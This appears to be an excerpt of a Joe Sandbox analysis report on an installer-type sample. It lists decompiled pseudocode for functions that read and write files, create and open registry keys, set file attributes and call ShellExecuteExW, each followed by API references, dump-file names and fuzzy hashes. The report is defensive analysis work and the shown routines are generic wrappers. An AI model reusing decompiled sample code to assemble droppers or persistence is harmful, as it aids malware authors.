                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004027E9 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 33%
                                                        			E004027E9(intOrPtr __edx, void* __eflags) {
				long _t8;
				long _t10;
				LONG* _t12;
				void* _t14;
				intOrPtr _t15;
				void* _t17;
				void* _t19;

				_t15 = __edx;
				_push(ds);
				if(__eflags != 0) {
					_t8 = E00402C15(2);
					_pop(_t14);
					 *((intOrPtr*)(_t19 - 0x4c)) = _t15;
					_t10 = SetFilePointer(E004061AC(_t14, _t17), _t8, _t12,  *(_t19 - 0x1c)); // executed
					if( *((intOrPtr*)(_t19 - 0x24)) >= _t12) {
						_push(_t10);
						_push( *((intOrPtr*)(_t19 - 0xc)));
						E00406193();
					}
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}










                                                        0x004027e9
                                                        0x004027e9
                                                        0x004027ea
                                                        0x004027f2
                                                        0x004027f7
                                                        0x004027f8
                                                        0x00402807
                                                        0x00402810
                                                        0x00402a61
                                                        0x00402a62
                                                        0x00402a65
                                                        0x00402a65
                                                        0x00402810
                                                        0x00402ac2
                                                        0x00402ace

                                                        APIs
                                                        • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402807
                                                          • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: FilePointerwsprintf
                                                        • String ID:
                                                        • API String ID: 327478801-0
                                                        • Opcode ID: 4643b5bc4f6d9a4cf216ebc2a3e4c5933704e38c523c14cff5c4d3e265dd41fa
                                                        • Instruction ID: 8e859e92f5722eba9353145e96b7f7bbf63091ba891c9fc52d729c0f29c6f3b3
                                                        • Opcode Fuzzy Hash: 4643b5bc4f6d9a4cf216ebc2a3e4c5933704e38c523c14cff5c4d3e265dd41fa
                                                        • Instruction Fuzzy Hash: A0E09271E00104AFDB11EFA5AE498AE7779DB40304B14403BF101F51D2CA790D128E2E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00402306 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00402306(int __eax, WCHAR* __ebx) {
				WCHAR* _t11;
				WCHAR* _t13;
				void* _t17;
				int _t21;

				_t11 = __ebx;
				_t5 = __eax;
				_t13 = 0;
				if(__eax != __ebx) {
					__eax = E00402C37(__ebx);
				}
				if( *((intOrPtr*)(_t17 - 0x24)) != _t11) {
					_t13 = E00402C37(0x11);
				}
				if( *((intOrPtr*)(_t17 - 0x18)) != _t11) {
					_t11 = E00402C37(0x22);
				}
				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402C37(0xffffffcd)); // executed
				_t21 = _t5;
				if(_t21 == 0) {
					 *((intOrPtr*)(_t17 - 4)) = 1;
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}







                                                        0x00402306
                                                        0x00402306
                                                        0x00402308
                                                        0x0040230c
                                                        0x0040230f
                                                        0x00402314
                                                        0x00402319
                                                        0x00402322
                                                        0x00402322
                                                        0x00402327
                                                        0x00402330
                                                        0x00402330
                                                        0x0040233d
                                                        0x004015b4
                                                        0x004015b6
                                                        0x00402885
                                                        0x00402885
                                                        0x00402ac2
                                                        0x00402ace

                                                        APIs
                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfileStringWrite
                                                        • String ID:
                                                        • API String ID: 390214022-0
                                                        • Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                        • Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
                                                        • Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                        • Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004060E7 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E004060E7(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E0040603E(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}






                                                        0x004060f1
                                                        0x004060fa
                                                        0x00406110
                                                        0x00000000
                                                        0x00406110
                                                        0x004060fe
                                                        0x00000000

                                                        APIs
                                                        • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406110
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                        • Instruction ID: 2d66df08b7a29efef6dff9ba5d381340db71bdfba6c3c9a2337d9ff24a0a933a
                                                        • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                        • Instruction Fuzzy Hash: 3FE0E672120109BEEF199F90DD0BD7B371DE704344F11452EFA06D4051E6B6A9309A78
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405DC1 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00405DC1(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                        0x00405dc5
                                                        0x00405dd5
                                                        0x00405ddd
                                                        0x00000000
                                                        0x00405de4
                                                        0x00000000
                                                        0x00405de6

                                                        APIs
                                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032F2,00000000,00000000,00403149,?,00000004,00000000,00000000,00000000), ref: 00405DD5
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                        • Instruction ID: 049d94eeec1c3219778d14f023c81a0d93a8da43d693805162a6c59e2ada833e
                                                        • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                        • Instruction Fuzzy Hash: C8E0EC3221125AABDF10AF559C04EEB7B6CEF05760F048837F915E6150D631E8619BA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405DF0 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00405DF0(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                        0x00405df4
                                                        0x00405e04
                                                        0x00405e0c
                                                        0x00000000
                                                        0x00405e13
                                                        0x00000000
                                                        0x00405e15

                                                        APIs
                                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000000,?,004032C0,000000FF,0040CEA0,00000000,0040CEA0,00000000,?,00000004,00000000), ref: 00405E04
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: FileWrite
                                                        • String ID:
                                                        • API String ID: 3934441357-0
                                                        • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                        • Instruction ID: 615bc9b617cbd9c004defc23c3f46b4eb24d278b47416a1e56efd721f2399a3b
                                                        • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                        • Instruction Fuzzy Hash: 1AE0EC3262465AABDF10AF55DC00AEB7B6CFB453A0F004836FD55E3150D671EA219BE8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004060B9 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E004060B9(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E0040603E(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}






                                                        0x004060c3
                                                        0x004060ca
                                                        0x004060dd
                                                        0x00000000
                                                        0x004060dd
                                                        0x004060ce
                                                        0x00000000

                                                        APIs
                                                        • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406147,?,00000000,?,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,?), ref: 004060DD
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: Open
                                                        • String ID:
                                                        • API String ID: 71445658-0
                                                        • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                        • Instruction ID: 58905e2b4c491557ae101ac833ec4d98e5c4c38dddbb54ebc3676a7d29ad937b
                                                        • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                        • Instruction Fuzzy Hash: 90D0123204020DBBDF119E90ED01FAB3B1DAB04750F014426FE16A5090D775D570AB14
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E004015A3() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesW(E00402C37(0xfffffff0),  *(_t11 - 0x24)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}






                                                        0x004015ae
                                                        0x004015b4
                                                        0x004015b6
                                                        0x00402885
                                                        0x00402885
                                                        0x00402ac2
                                                        0x00402ace

                                                        APIs
                                                        • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: d6d9806800ec5ccd533d2c0c0804cc6b52acb563155f8df96d71c34e139e9099
                                                        • Instruction ID: 98fc1d19ac344296b2804d9baf38034e6035577dbf93b3ceff4c84e4d608f923
                                                        • Opcode Fuzzy Hash: d6d9806800ec5ccd533d2c0c0804cc6b52acb563155f8df96d71c34e139e9099
                                                        • Instruction Fuzzy Hash: 85D01272B04104DBDB21DBA4AF0859E72A59B10364B204677E101F11D1DAB989559A59
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040422D Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0040422D(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x4291d8;
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}





                                                        0x0040422d
                                                        0x00404234
                                                        0x0040423f
                                                        0x00000000
                                                        0x0040423f
                                                        0x00404245

                                                        APIs
                                                        • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                                        • Instruction ID: d07d2c2d8c4880ed0075d79043221f50ab42e2b574db457b7482678080f727f2
                                                        • Opcode Fuzzy Hash: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                                        • Instruction Fuzzy Hash: 42C04C717402017BEA208B519D49F1677549790B40F1484797740E50E0D674E450D62C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405874 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00405874(struct _SHELLEXECUTEINFOW* _a4) {
				struct _SHELLEXECUTEINFOW* _t4;
				int _t5;

				_t4 = _a4;
				_t4->lpIDList = _t4->lpIDList & 0x00000000;
				_t4->cbSize = 0x3c; // executed
				_t5 = ShellExecuteExW(_t4); // executed
				return _t5;
			}





                                                        0x00405874
                                                        0x00405879
                                                        0x0040587d
                                                        0x00405883
                                                        0x00405889

                                                        APIs
                                                        • ShellExecuteExW.SHELL32(?), ref: 00405883
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: ExecuteShell
                                                        • String ID:
                                                        • API String ID: 587946157-0
                                                        • Opcode ID: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                        • Instruction ID: 322818d701d9cc3fc85427ca8463de8bac6637280c84b784c1803e53dd53602d
                                                        • Opcode Fuzzy Hash: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                        • Instruction Fuzzy Hash: 55C092B2000200DFE301CF90CB08F067BF8AF59306F028058E1849A160C7788800CB69
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00404216 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00404216(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x42a208, 0x28, _a4, 1); // executed
				return _t2;
			}




                                                        0x00404224
                                                        0x0040422a

                                                        APIs
                                                        • SendMessageW.USER32(00000028,?,00000001,00404041), ref: 00404224
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
